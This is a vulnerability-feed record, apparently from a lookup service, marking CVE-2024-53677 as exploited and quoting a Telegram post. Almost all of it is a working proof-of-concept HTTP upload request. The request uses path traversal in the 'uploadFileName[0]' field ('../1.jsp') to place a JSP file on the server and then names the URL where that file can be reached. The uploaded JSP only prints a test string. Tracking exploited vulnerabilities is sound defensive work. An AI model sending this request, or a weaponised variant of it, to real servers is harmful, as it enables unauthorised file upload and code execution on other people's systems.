{"uuid": "c739ce32-b57e-471d-8bfa-3ba890a1d543", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-53677", "type": "exploited", "source": "https://t.me/ckeArsenal/240", "content": "CVE-2024-53677\n\nPOST /untitled_war/uploads.action HTTP/1.1\nHost: IP:8080\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate, br\nReferer: http://172.16.65.98:8080/untitled_war/\nContent-Type: multipart/form-data; boundary=---------------------------376058448320617365003265882680\nContent-Length: 529\nOrigin: http://192.168.0.116:8080\nConnection: close\nCookie: JSESSIONID=953590EEDDD585B3CFE1A15E18C518C9\nUpgrade-Insecure-Requests: 1\nPriority: u=0, i\n\n-----------------------------376058448320617365003265882680\nContent-Disposition: form-data; name=\"Upload\"; filename=\"1.txt\"\nContent-Type: application/octet-stream\n\n<%@ page language=\"java\" contentType=\"text/html; charset=UTF-8\" pageEncoding=\"UTF-8\"%>\n\n\n\n\n    \ntest\n\n\n\n\n-----------------------------376058448320617365003265882680\nContent-Disposition: form-data; name=\"uploadFileName[0]\";\n\n../1.jsp\n-----------------------------376058448320617365003265882680--\n\n/untitled_war/1.jsp\n\n#exploit #poc", "creation_timestamp": "2024-12-22T17:04:11.000000Z"}